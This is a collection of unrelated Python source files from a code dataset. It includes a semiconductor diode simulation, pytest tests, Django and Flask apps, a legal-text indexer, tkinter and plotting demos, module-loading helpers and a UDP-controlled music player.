contact)\n c_eqs = ds.get_contact_equation_list(device=device, contact=contact)\n for ceq in c_eqs:\n print(\"\\t\\tContact Equation : \" + ceq)\n\n\ndef plot_charge(regions):\n fields = (\"Electrons\", \"Holes\", \"Donors\", \"Acceptors\")\n plt.figure()\n for var_name in fields:\n total_x = np.array([])\n total_y = []\n for region in regions:\n x = np.array(get_node_model_values(device=device, region=region, name=\"x\"))\n # print(var_name, min(x), max(x), min(x)*1e4, max(x)*1e4)\n total_x = np.append(total_x, x)\n y=get_node_model_values(device=device, region=region, name=var_name)\n total_y.extend(y)\n # plt.axis([min(x), max(x), ymin, ymax])\n plt.semilogy(np.array(total_x)*1e4, total_y)\n plt.xlabel('x (um)')\n plt.ylabel('Density (#/cm^3)')\n plt.legend(fields)\n # plt.savefig(\"diode_1d_density.png\")\n####\n#### Meshing\n####\ndef createMesh(device, region):\n create_1d_mesh(mesh=\"dio\")\n add_1d_mesh_line(mesh=\"dio\", pos=0, ps=5e-8, tag=\"top\")\n add_1d_mesh_line(mesh=\"dio\", pos=0.5e-5, ps=1e-9, tag=\"mid\")\n add_1d_mesh_line(mesh=\"dio\", pos=1e-5, ps=5e-8, tag=\"bot\")\n add_1d_contact (mesh=\"dio\", name=\"top\", tag=\"top\", material=\"metal\")\n add_1d_contact (mesh=\"dio\", name=\"bot\", tag=\"bot\", material=\"metal\")\n add_1d_region (mesh=\"dio\", material=\"Si\", region=region, tag1=\"top\", tag2=\"bot\")\n finalize_mesh(mesh=\"dio\")\n create_device(mesh=\"dio\", device=device)\n\ndevice=\"MyDevice\"\nregion=\"MyRegion\"\n\ncreateMesh(device, region)\n\n####\n#### Set parameters for 300 K\n####\nset_parameter(name=\"T\", value=300)\nSetSiliconParameters(device, region)\nset_parameter(device=device, region=region, name=\"taun\", value=1e-8)\nset_parameter(device=device, region=region, name=\"taup\", value=1e-8)\nset_parameter(device=device, region=region, name=\"n1\", value=1e10)\nset_parameter(device=device, region=region, name=\"p1\", value=1e10)\n\n\n####\n#### NetDoping\n####\nCreateNodeModel(device, region, \"Acceptors\", \"1.0e18*step(0.5e-5-x)\")\nCreateNodeModel(device, region, \"Donors\", \"1.0e18*step(x-0.5e-5)\")\nCreateNodeModel(device, region, \"NetDoping\", \"Donors-Acceptors\")\nprint_node_values(device=device, region=region, name=\"NetDoping\")\n\n####\n#### Create Potential, Potential@n0, Potential@n1\n####\nCreateSolution(device, region, \"Potential\")\n\n####\n#### Create potential only physical models\n####\nCreateSiliconPotentialOnly(device, region)\n\n####\n#### Set up the contacts applying a bias\n####\nfor i in get_contact_list(device=device):\n set_parameter(device=device, name=GetContactBiasName(i), value=0.0)\n CreateSiliconPotentialOnlyContact(device, region, i)\n\n\n####\n#### Initial DC solution\n####\nsolve(type=\"dc\", absolute_error=1.0e2, relative_error=1e-1, maximum_iterations=100, solver_type='iterative')\n\n####\n#### drift diffusion solution variables\n####\nCreateSolution(device, region, \"Electrons\")\nCreateSolution(device, region, \"Holes\")\n\nCreateEField(device, region)\nCreateDField(device, region)\nopts = CreateAroraMobilityLF(device, region)\nopts = CreateHFMobility(device, region, **opts)\n# CreateHFMobility(device, region, **opts)\n\nset_parameter(device=device, region=region, name=\"BETAN\", value=2.0)\nset_parameter(device=device, region=region, name=\"BETAP\", value=1.0)\nset_parameter(device=device, region=region, name=\"VSATN0\", value=2.4e7)\nset_parameter(device=device, region=region, name=\"VSATP0\", value=2.4e7)\nset_parameter(device=device, region=region, name=\"VSATN.A\", value=0.8)\nset_parameter(device=device, region=region, name=\"VSATP.A\", value=0.8)\n\n\n####\n#### create initial guess from dc only solution\n####\nset_node_values(device=device, region=region, name=\"Electrons\", init_from=\"IntrinsicElectrons\")\nset_node_values(device=device, region=region, name=\"Holes\", init_from=\"IntrinsicHoles\")\n\n# import physics.model_create\n#physics.model_create.debug=True\n###\n### Set up equations\n###\nCreateSiliconDriftDiffusion(device, region, **opts)\nfor i in get_contact_list(device=device):\n CreateSiliconDriftDiffusionContact(device, region, i, Jn=opts['Jn'], Jp=opts['Jp'])\n\n###\n### Drift diffusion simulation at equilibrium\n###\n# set_parameter(device=device, name=GetContactBiasName(\"bot\"), value=2.0)\nsolve(type=\"dc\", absolute_error=1e10, relative_error=1e-10, maximum_iterations=100)\nprint(\">>After Equil<<\")\n\nget_ds_status()\n####\n#### Ramp the bias to 0.5 Volts\n####\nvolts=[]\ncurrent=[]\nv = 0.0\nwhile v < 0.51:\n # plot_charge([region])\n set_parameter(device=device, name=GetContactBiasName(\"bot\"), value=v)\n set_parameter(device=device, name=GetContactBiasName(\"top\"), value=0.0)\n print(v)\n solve(type=\"dc\", absolute_error=1e6, relative_error=1e-12, maximum_iterations=300)\n # PrintCurrents(device, \"top\")\n # PrintCurrents(device, \"bot\")\n for contact in ds.get_contact_list(device=device):\n e_current = abs(ds.get_contact_current(device=device, contact=contact, equation=ECE_NAME))\n e_current += abs(ds.get_contact_current(device=device, contact=contact, equation=HCE_NAME))\n current.append(e_current)\n volts.append(v)\n v += 0.02\n# plt.show()\nplt.figure()\nplt.semilogy(volts, current)\nplt.figure()\nplt.plot(volts, current)\n # pydevsim.plot_charge(regions=regions)\n # pydevsim.plot_current(regions=regions)\nplt.show()\n\nwrite_devices(file=\"diode_1d.tec\", type=\"tecplot\")\n\nx=get_node_model_values(device=device, region=region, name=\"x\")\nymax = 10\nymin = 10\nfields = (\"Electrons\", \"Holes\", \"Donors\", \"Acceptors\")\nfor i in fields:\n y=get_node_model_values(device=device, region=region, name=i)\n if (max(y) > ymax):\n ymax = max(y)\n matplotlib.pyplot.semilogy(x, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('Density (#/cm^3)')\nmatplotlib.pyplot.legend(fields)\nymax *= 10\nmatplotlib.pyplot.axis([min(x), max(x), ymin, ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_density.png\")\nmatplotlib.pyplot.show()\n\nmatplotlib.pyplot.clf()\nedge_average_model(device=device, region=region, node_model=\"x\", edge_model=\"xmid\")\nxmid=get_edge_model_values(device=device, region=region, name=\"xmid\")\n#efields = (\"Jn_arora_lf\", \"Jp_arora_lf\" )\n#efields = (\"Jn\", \"Jp\", \"Jn_arora_lf\", \"Jp_arora_lf\" )\nefields = (\"Jn\", \"Jp\")\ny=get_edge_model_values(device=device, region=region, name=efields[0])\nymin=min(y)\nymax=max(y)\nfor i in efields:\n y=get_edge_model_values(device=device, region=region, name=i)\n if min(y) < ymin:\n ymin = min(y)\n elif max(y) > ymax:\n ymax = max(y)\n matplotlib.pyplot.plot(xmid, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('J (A/cm^2)')\nmatplotlib.pyplot.legend(efields)\nmatplotlib.pyplot.axis([min(x), max(x), 0.5*ymin, 2*ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_current.png\")\nmatplotlib.pyplot.show()\nprint (ymin)\nprint (ymax)\n\nmatplotlib.pyplot.clf()\nedge_average_model(device=device, region=region, node_model=\"x\", edge_model=\"xmid\")\nxmid=get_edge_model_values(device=device, region=region, name=\"xmid\")\nefields = (\"mu_arora_n_lf\", \"mu_arora_p_lf\", \"mu_n\", \"mu_p\", )\n#efields = (\"Jn\", \"Jp\", \"Jn_arora_lf\", \"Jp_arora_lf\" )\ny=get_edge_model_values(device=device, region=region, name=efields[0])\nymin=min(y)\nymax=max(y)\nfor i in efields:\n y=get_edge_model_values(device=device, region=region, name=i)\n if min(y) < ymin:\n ymin = min(y)\n elif max(y) > ymax:\n ymax = max(y)\n matplotlib.pyplot.plot(xmid, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('J (A/cm^2)')\nmatplotlib.pyplot.legend(efields)\nmatplotlib.pyplot.axis([min(x), max(x), 0.5*ymin, 2*ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_mobility.png\")\nmatplotlib.pyplot.show()\nprint (ymin)\nprint (ymax)\n\n\n#x=get_node_model_values(device=device, region=region, name=\"x\")\nymax = 10\nymin = 10\nfields = (\"USRH\",)\nfor i in fields:\n y=get_node_model_values(device=device, region=region, name=i)\n if (max(y) > ymax):\n ymax = max(y)\n matplotlib.pyplot.semilogy(np.array(x)*10000, y)\nmatplotlib.pyplot.xlabel('x (nm)')\nmatplotlib.pyplot.ylabel('Density (#/cm^3)')\nmatplotlib.pyplot.legend(fields)\nymax *= 10\nmatplotlib.pyplot.axis([min(x)*10000, max(x)*10000, ymin, ymax])\nmatplotlib.pyplot.savefig(\"USRH.png\")\nmatplotlib.pyplot.show()\n","sub_path":"noclass/diode_1d.py","file_name":"diode_1d.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"8731661","text":"from data_structures_and_algorithms.challenges.fizz_buzz_tree.fizz_buzz_tree import FizzBuzzTree,BinaryTree,Node\nimport pytest\n\ndef test_fizzbuzz_1(pre_data_1):\n \"\"\"\n test for fizz and buzz, if the data is numbers\n \"\"\"\n expected=['2', '4', 'Fizz', 'FizzBuzz', '7', 'Buzz', 'Fizz']\n actual =FizzBuzzTree(pre_data_1)\n assert expected==actual\n\n\ndef test_fizzbuzz_2(pre_data_2):\n \"\"\"\n test for fizz and buzz, if there is data that its non number\n \"\"\"\n expected=['2', '4', 'Fizz', 'B', 'A', 'FizzBuzz', 'm', 'Buzz', 'Fizz']\n actual =FizzBuzzTree(pre_data_2)\n assert expected==actual\n\ndef test_fizzbuzz_none(pre_data_2):\n \"\"\"\n test for fizz and buzz, if there is no data at all\n \"\"\"\n bt=BinaryTree()\n \n \n expected=[]\n actual =FizzBuzzTree(bt)\n assert expected==actual\n\n\n@pytest.fixture\ndef pre_data_1():\n bt=BinaryTree()\n bt.root=Node(2)\n bt.root.left=Node(4)\n bt.root.left.right=Node(30)\n bt.root.left.left=Node(12)\n bt.root.right=Node(7)\n bt.root.right.right=Node(18)\n bt.root.right.left=Node(10)\n return bt\n\n@pytest.fixture\ndef pre_data_2():\n bt=BinaryTree()\n bt.root=Node(2)\n bt.root.left=Node(4)\n bt.root.left.right=Node(30)\n bt.root.left.left=Node(12)\n bt.root.left.left.right=Node(\"A\")\n bt.root.left.left.left=Node(\"B\")\n bt.root.right=Node(\"m\")\n bt.root.right.right=Node(18)\n bt.root.right.left=Node(10)\n return bt\n\n\n","sub_path":"tests/challenges/test_k_ary_tree.py","file_name":"test_k_ary_tree.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"593190195","text":"from orator.migrations import Migration\n\n\nclass CreateTypeResourcesTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('tipoRecurso') as table:\n table.increments('idTipoRecurso')\n table.string('nombre', 250).unique()\n table.string('descripcion', 250)\n table.string('mensaje', 250)\n table.string('identificador', 250)\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('tipoRecurso')\n","sub_path":"migrations/2020_09_02_003049_create_type_resources_table.py","file_name":"2020_09_02_003049_create_type_resources_table.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170480458","text":"from flask import Flask\nimport weather\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Welcome to the weather machine! Try going to http://localhost/temperature/provo to see how it works!'\n\n\n@app.route('/temperature/')\ndef temperature(city):\n city_temp = weather.get_temperature_by_city(city)\n return f\"The temperature in {city} is {city_temp}\"\n\n\n@app.route('/temperature_c/')\ndef temperature_celsius(city):\n # filled missing parameter\n city_temp = weather.get_temperature_by_city(city)\n return f\"The temperature in {city} is {city_temp} ({weather.convert_fahrenheit_to_celsius(city_temp)} Celsius)\"\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12684408","text":"#!/usr/bin/python3\nimport re\nfrom collections import defaultdict\n\nimport nltk\nimport sys\nimport getopt\nimport os\nimport csv\n\nimport util\nfrom dictionary import Dictionary\nfrom postingsfile import PostingsFile\nimport court \n\n\nmaxInt = sys.maxsize\nwhile True:\n try:\n csv.field_size_limit(maxInt)\n break\n except OverflowError:\n maxInt = int(maxInt/10)\n\n\ndef usage():\n print(\"usage: \" + sys.argv[0] + \" -i dataset-file -d dictionary-file -p postings-file\")\n\n\ndef process_csv(dataset_file, out_dict):\n \"\"\"\n Parses and processes the CSV data file to create the index and postings lists.\n\n Params:\n - dataset_file: Path to dataset\n - out_dict: Path to save dictionary to\n\n Returns:\n - dictionary: Dictionary containing index and postings\n \"\"\"\n dictionary = Dictionary(out_dict)\n\n with open(dataset_file, encoding=\"utf8\") as dataset_csv:\n i = 0\n prev_docId = 0\n\n csv_reader = csv.reader(dataset_csv)\n for row in csv_reader:\n i += 1\n\n # Skip CSV header\n if i == 1:\n continue\n\n docId = row[0]\n\n # Skip duplicate document IDs\n if prev_docId == docId:\n continue\n \n # For each document, get the content tokens and add it to the posting lists\n tokens = util.preprocess_content(row[1] + \" \" + row[2] + \" \" + row[3] + \" \" + row[4])\n normalised_tf = dictionary.add_tokens_of_doc(tokens, docId)\n\n # Maintain document lengths and count in dictionary\n dictionary.add_normalised_doc_length(docId, normalised_tf)\n dictionary.add_court_weight(docId, court.get_court_weight(row[4]))\n dictionary.add_doc_count()\n\n prev_docId = docId\n\n dataset_csv.close()\n\n return dictionary\n\n\ndef build_index(dataset_file, out_dict, out_postings):\n \"\"\"\n build index from documents stored in the dataset file,\n then output the dictionary file and postings file\n \"\"\"\n print('indexing...')\n\n postings_file = PostingsFile(out_postings)\n\n dictionary = process_csv(dataset_file, out_dict)\n\n # Save dictionary and postings lists to disk\n postings_file.save(dictionary)\n dictionary.save()\n\n\ndataset_file = output_file_dictionary = output_file_postings = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], 'i:d:p:')\nexcept getopt.GetoptError:\n usage()\n sys.exit(2)\n\nfor o, a in opts:\n if o == '-i': # dataset file\n dataset_file = a\n elif o == '-d': # dictionary file\n output_file_dictionary = a\n elif o == '-p': # postings file\n output_file_postings = a\n else:\n assert False, \"unhandled option\"\n\nif dataset_file == None or output_file_postings == None or output_file_dictionary == None:\n usage()\n sys.exit(2)\n\nbuild_index(dataset_file, output_file_dictionary, output_file_postings)\n","sub_path":"legal-case-retrieval/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613161039","text":"import tkinter as tk\n\n# create the event handler to clear the text\ndef evClear():\n lHistory['text'] = eHello.get()\n eHello.delete(0, tk.END)\n\n# create the top level window/frame\ntop = tk.Tk()\nF = tk.Frame(top)\nF.pack(fill=\"both\")\n\n# Now the frame with text entry\nfEntry = tk.Frame(F, border=1)\neHello = tk.Entry(fEntry)\neHello.pack(side=\"left\")\nlHistory = tk.Label(fEntry, text=\" \", foreground=\"steelblue\")\nlHistory.pack(side=\"bottom\", fill=\"x\")\nfEntry.pack(side=\"top\")\n\n# Finally the frame with the buttons. \n# We'll sink this one for emphasis\nfButtons = tk.Frame(F, relief=\"sunken\", border=1)\nbClear = tk.Button(fButtons, text=\"Clear Text\", command=evClear)\nbClear.pack(side=\"left\", padx=5, pady=2)\nbQuit = tk.Button(fButtons, text=\"Quit\", command=F.quit)\nbQuit.pack(side=\"left\", padx=5, pady=2)\nfButtons.pack(side=\"top\", fill=\"x\")\n\n# Now run the eventloop\nF.mainloop()\n","sub_path":"source_code/python_projects/Chapter4/Tkinter/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"280460317","text":"from django.db import models,transaction\nfrom django.conf import settings\nfrom django.utils import timezone \nfrom datetime import datetime\n\nfrom django.contrib.auth.models import (\n AbstractBaseUser, PermissionsMixin, BaseUserManager\n)\n \nclass UserManager(BaseUserManager):\n \n def _create_user(self, name, password, **extra_fields):\n \"\"\"\n Creates and saves a User with the given email,and password.\n \"\"\"\n if not name:\n raise ValueError('The given email must be set')\n try:\n with transaction.atomic():\n user = self.model(name=name, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n except:\n raise\n \n def create_user(self, name, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(name, password, **extra_fields)\n\n def create_superuser(self, name, password, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n \n return self._create_user(name, password=password, **extra_fields) \n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"\n An abstract base class implementing a fully featured User model with\n admin-compliant permissions.\n \n \"\"\"\n # email = models.EmailField(max_length=40, blank=True, null=True)\n name = models.CharField(max_length=30, blank=True, unique=True)\n role = models.CharField(max_length=20, blank=True)\n phone_number = models.CharField(max_length=10,null=True) \n #last_name = models.CharField(max_length=30, blank=True)\n is_active = models.BooleanField(default=True)\n is_staff = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=timezone.now)\n \n objects = UserManager()\n \n USERNAME_FIELD = 'name'\n REQUIRED_FIELDS = ['role']\n \n def save(self, *args, **kwargs):\n super(User, self).save(*args, **kwargs)\n return self\n\n# Create your models here.\nclass Type(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n color = models.CharField(max_length=10, default=\"\")\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Chit(models.Model):\n id = models.AutoField(primary_key=True)\n amount = models.IntegerField()\n remarks = models.CharField(max_length=300, null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n s=str(self.amount)\n return s\n\nclass Group(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100, unique=True)\n type_id = models.ForeignKey(Type, on_delete=models.CASCADE)\n remarks = models.CharField(max_length=300, null=True)\n chit_id = models.ForeignKey(Chit, on_delete=models.CASCADE)\n start_date = models.DateTimeField(default=datetime.now)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Members(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100,unique=True)\n phone_number = models.CharField(max_length=10,null=True) \n note = models.CharField(max_length=300, null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass GroupMembers(models.Model):\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n s=str(self.group_id)\n return s\n\n\n# class Users(models.Model):\n# id = models.AutoField(primary_key=True)\n# name = models.CharField(max_length=100,unique=True)\n# phone_number = models.CharField(max_length=10,null=True) \n# role = models.CharField(max_length=100)\n# pin = models.CharField(max_length=4)\n# status = models.IntegerField(default=1)\n# published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n# def __str__(self):\n# return self.name+\" - \"+self.role\n\nclass ExpenseCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100,unique=True)\n remarks = models.CharField(max_length=300,null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Expense(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True, default=datetime.now)\n category_id = models.ForeignKey(ExpenseCategory, on_delete=models.CASCADE)\n amount = models.IntegerField()\n\n def __str__(self):\n s=str(self.amount)\n return s\n\nclass Transaction(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n amount = models.IntegerField()\n remarks = models.CharField(max_length=300,blank=True, null=True)\n payment_mode = models.CharField(max_length=50)\n createdBy = models.ForeignKey(User, on_delete=models.CASCADE)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n \n def publish(self):\n self.date = datetime.now()\n self.save()\n\nclass Commission(models.Model):\n profit_commission = models.FloatField()\n auction_commission = models.FloatField()\n \n def __str__(self):\n s=str(self.profit_commission)\n return s\n \nclass GroupAuction(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True)\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n auction_amount = models.IntegerField(default=0)\n payable = models.IntegerField(default=0)\n month = models.IntegerField(default=0)\n remarks = models.CharField(max_length=300,blank=True, null=True)\n createdBy = models.ForeignKey(User, on_delete=models.CASCADE)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n status = models.IntegerField(default=0)\n\n def publish(self):\n self.date = datetime.now()\n self.save()\n\nclass PayableAuction(models.Model):\n id = models.AutoField(primary_key=True)\n auction_id = models.ForeignKey(GroupAuction, on_delete=models.CASCADE)\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n total_payable = models.IntegerField(default=0)\n paid_amount = models.IntegerField(default=0)\n payment_status = models.IntegerField(default=0)\n updated_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n \n def publish(self):\n self.updated_date = datetime.now()\n self.save()","sub_path":"chit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"434377751","text":"import matplotlib.pyplot as plt \n\n# Function to plot data for a single agent\ndef plotSingle(X, Y, title):\n\tplt.ylabel(f'Episodes')\n\tplt.xlabel('Timesteps')\n\tline, = plt.plot(X, Y)\n\tline.set_label(title)\n\tplt.legend()\n\tplt.title(title)\n\tplt.show()\n\n# Function to compare between different agents\ndef plotComparision(X, Y, role):\n\tplt.ylabel(f'Episodes')\n\tplt.xlabel('Timesteps')\n\tif role == '1':\n\t\tagents = ['Sarsa(0)', 'Q-learning', 'Expected Sarsa']\n\t\ttitle = 'Comparision between different agents'\n\telif role == '2':\n\t\tagents = ['Sarsa(0)', 'With King\\'s move', 'With King\\'s move and stochastic wind']\n\t\ttitle = 'Comparision for different scenarios'\n\tfor i in range(len(Y)):\n\t\tline, = plt.plot(X, Y[i])\n\t\tline.set_label(f'{agents[i]}')\n\tplt.legend()\n\tplt.title(title)\n\tplt.show()\n","sub_path":"Assignment3/submission/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"130543054","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"Miscellaneous helpers.\"\"\"\n\nimport builtins\nimport importlib.util\nimport logging\nimport os\nimport sys\nimport types\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_module(spec):\n \"\"\"Try to execute a module. Return None if the attempt fail.\"\"\"\n try:\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n return module\n except Exception:\n return None\n\n\ndef locate(path):\n \"\"\"Locate an object by name or dotted path, importing as necessary.\"\"\"\n parts = [part for part in path.split(\".\") if part]\n module, n = None, 0\n while n < len(parts):\n file_location = os.path.join(*parts[: n + 1])\n spec_name = \".\".join(parts[: n + 1])\n module_location = os.path.join(file_location, \"__init__.py\")\n spec = importlib.util.spec_from_file_location(spec_name, module_location)\n logger.debug(\"Trying to import {}\".format(module_location))\n nextmodule = _get_module(spec)\n if nextmodule is None:\n module_location = file_location + \".py\"\n spec = importlib.util.spec_from_file_location(spec_name, module_location)\n logger.debug(\"Trying to import {}\".format(module_location))\n nextmodule = _get_module(spec)\n\n if nextmodule:\n module, n = nextmodule, n + 1\n else:\n break\n if module:\n object = module\n else:\n object = builtins\n for part in parts[n:]:\n try:\n object = getattr(object, part)\n except AttributeError:\n return None\n return object\n\n\ndef load_module(dotted_path: str, filepath: os.PathLike):\n \"\"\"\n Load a module.\n\n :param dotted_path: the dotted path of the package/module.\n :param filepath: the file to the package/module.\n :return: None\n :raises ValueError: if the filepath provided is not a module.\n :raises Exception: if the execution of the module raises exception.\n \"\"\"\n spec = importlib.util.spec_from_file_location(dotted_path, filepath)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module) # type: ignore\n return module\n\n\ndef import_module(dotted_path: str, module_obj) -> None:\n \"\"\"\n Add module to sys.modules.\n\n :param dotted_path: the dotted path to be used in the imports.\n :param module_obj: the module object. It is assumed it has been already executed.\n :return: None\n \"\"\"\n # if path is nested, and the root package is not present, add it to sys.modules\n split = dotted_path.split(\".\")\n if len(split) > 1 and split[0] not in sys.modules:\n root = split[0]\n sys.modules[root] = types.ModuleType(root)\n\n # add the module at the specified path.\n sys.modules[dotted_path] = module_obj\n\n\ndef load_agent_component_package(\n item_type: str, item_name: str, author_name: str, directory: os.PathLike\n):\n \"\"\"\n Load a Python package associated to a component..\n\n :param item_type: the type of the item. One of \"protocol\", \"connection\", \"skill\".\n :param item_name: the name of the item to load.\n :param author_name: the name of the author of the item to load.\n :param directory: the component directory.\n :return: the module associated to the Python package of the component.\n \"\"\"\n item_type_plural = item_type + \"s\"\n dotted_path = \"packages.{}.{}.{}\".format(author_name, item_type_plural, item_name)\n filepath = Path(directory) / \"__init__.py\"\n return load_module(dotted_path, filepath)\n\n\ndef add_agent_component_module_to_sys_modules(\n item_type: str, item_name: str, author_name: str, module_obj\n) -> None:\n \"\"\"\n Add an agent component module to sys.modules.\n\n :param item_type: the type of the item. One of \"protocol\", \"connection\", \"skill\"\n :param item_name: the name of the item to load\n :param author_name: the name of the author of the item to load.\n :param module_obj: the module object. It is assumed it has been already executed.\n :return:\n \"\"\"\n item_type_plural = item_type + \"s\"\n dotted_path = \"packages.{}.{}.{}\".format(author_name, item_type_plural, item_name)\n import_module(dotted_path, module_obj)\n","sub_path":"aea/helpers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177099626","text":"#-*-coding:UTF-8-*-\nimport os\nfrom pygame import mixer #从pygame里面导入我们的音乐播放器\nfrom socket import *\n\n\nhost = ''\nport =5679\t#设备接收端口一会填到手机\nbufsize = 1024\naddr = (host,port) \nudpServer = socket(AF_INET,SOCK_DGRAM)\nudpServer.bind(addr)\n\n\n\ndef findmus(): #找当前目录下的音乐,mp3和flac格式,aac不支持\n L=[]\n l=os.listdir()\n for f in l:\n if f.find(\".mp3\")==len(f)-4 or f.find(\".flac\")==len(f)-5:\n L.append(f) \n return(L)\n\ndef play(x): #播放函数,防止无法载入造成奔溃,这里用了try和except\n try:\n mixer.music.load(x)\n mixer.music.play()\n return 0\n except:\n return 1\n\n\ndef send(sdata): #向手机发送消息的函数\n sdata = sdata.encode()\n udpServer.sendto(sdata,addr)\n\ndef Is_Int(s): #判断str是否可以转换为int\n try: \n int(s)\n return True\n except ValueError:\n return False\n\nL=findmus() #创建一个空的列表用来存放所有找到的音乐\nmixer.init() #启动播放器\nnowplaying=0 #用来定位当前正在播放的歌曲\nprint(\"播放器已启动\")\nprint(\"找到以下歌曲:\")\nn=0\nfor i in L: #列一个歌单\n n=n+1\n print(str(n)+\".\"+i)\n\nwhile 1: #熟悉的循环,大家可以自定义对接收到的命令的处理\n data,addr = udpServer.recvfrom(bufsize)\n data=data.decode()\n if data==\"退出\":\n udpServer.close()\n mixer.quit()\n exit(0)\n \n elif data==\"有什么歌\":\n n=0\n for i in L:\n n=n+1\n send(str(n)+\".\"+i)\n \n elif Is_Int(data):\n if play(L[int(data)-1])==0:\n nowplaying=int(data)-1\n send(\"正在播放:\"+L[nowplaying])\n \n elif data==\"播放\":\n try:\n mixer.music.play()\n except:\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying])\n\n elif data==\"暂停\":\n mixer.music.pause()\n\n elif data==\"停\":\n mixer.music.stop()\n\n elif data==\"下一首\":\n nowplaying=nowplaying+1\n if nowplaying>len(L):\n nowplaying=0\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying])\n\n elif data==\"上一首\":\n nowplaying=nowplaying-1\n if nowplaying<0:\n nowplaying=len(L)\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying]) \n else:\n send(\"对不起,现在只支持这些指令:有什么歌,数字点播,播放,暂停,停,下一首,上一首,退出\")\n","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 